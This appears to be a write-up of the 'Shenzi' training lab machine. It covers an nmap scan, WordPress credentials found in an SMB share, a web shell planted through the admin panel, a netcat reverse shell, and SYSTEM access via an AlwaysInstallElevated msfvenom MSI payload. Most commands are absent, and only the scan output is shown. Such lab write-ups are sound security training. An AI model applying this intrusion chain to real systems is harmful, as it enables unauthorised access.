Shenzi
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 4000 -Pn 192.168.201.55
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 13:46 +08
Nmap scan report for 192.168.201.55
Host is up (0.18s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5040/tcp open unknown
7680/tcp open pando-pub
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknownLots of ports here. FTP doesn't allow for anonymous access.
SMB Access -> WP Creds
smbmap shows that there are a few shares we can access:
The share had a few interesting files:
passwords.txt contained some credentials to a Wordpress instance, while the rest of the files were rather uninteresting:
Web Enumeration -> WP RCE
Port 80 shows the default XAMPP page:
There was a PHPInfo page that we could view for more clues.
The only interesting thing to note is that the user is named shenzi on the machine. We need to be finding this wordpress instance. However, all directory scans failed to find any instance of wp-content or wp-admin.
I was stuck here for a while, until I visited /shenzi to test, and it worked!
With this, we can easily login to the admin panel and replace one of the PHP files with a web shell.
Then, we can get a reverse shell by downloading nc.exe onto the machine and executing it:
Privilege Escalation
AlwaysInstallElevated -> SYSTEM
I ran winPEAS.exe to enumerate the machine for me. It picked up on AlwaysInstallElevated being misconfigured:
Using this, we can generate an MSI payload using msfvenom and run it on the system, which would give us a reverse shell as the SYSTEM user.
Afterwards, transfer this file over to the machine and run msiexec on it:
This would give us a reverse shell as the SYSTEM user on a listener port:
Last updated